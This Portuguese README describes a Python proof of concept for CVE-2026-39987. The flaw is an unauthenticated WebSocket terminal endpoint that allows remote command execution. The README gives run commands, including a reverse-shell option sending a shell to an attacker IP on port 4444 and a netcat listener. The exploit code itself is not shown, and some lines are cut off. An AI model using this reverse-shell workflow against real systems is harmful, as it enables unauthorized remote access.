
Prova de conceito em Python para CVE-2026-39987, explorando um endpoint de terminal WebSocket não autenticado para obter execução remota de comandos e acesso a shell reverso.
Prova de Conceito para CVE-2026-39987, demonstrando execução remota de comandos através do endpoint de terminal WebSocket vulnerável.
Aviso: Esta PoC destina-se apenas a testes de segurança autorizados e uso educacional. Utilize-a apenas contra sistemas que possui ou para os quais tem permissão explícita de teste.
A vulnerabilidade permite que um utilizador não autenticado interaja com o endpoint de terminal WebSocket da aplicação e execute comandos remotamente.
A PoC liga-se a:
wss://<target>/terminal/ws
e demonstra a execução de comandos através da ligação WebSocket.
O alvo utilizado durante o desenvolvimento/teste desta PoC foi um ambiente de laboratório Hack The Box autorizado.
websocket-clientInstale a biblioteca necessária:
pip3 install websocket-client
python3 test.py <domain>
Exemplo:
python3 test.py somesite.com
A PoC estabelece a ligação WebSocket e executa um comando de teste.
A PoC também suporta uma opção de reverse shell:
python3 exploit.py <domain> --reverse-shell <IP> --port <PORT>
Exemplo:
python3 exploit.py somesite.com --reverse-shell 10.10.14.5 --port 4444
Inicie o listener antes de executar a PoC:
nc -lvnp 4444
A aplicação expõe um endpoint de terminal WebSocket sem exigir autenticação.
A PoC:
O ws.recv() inicial é importante porque o servidor envia o prompt da shell imediatamente após estabelecer a ligação.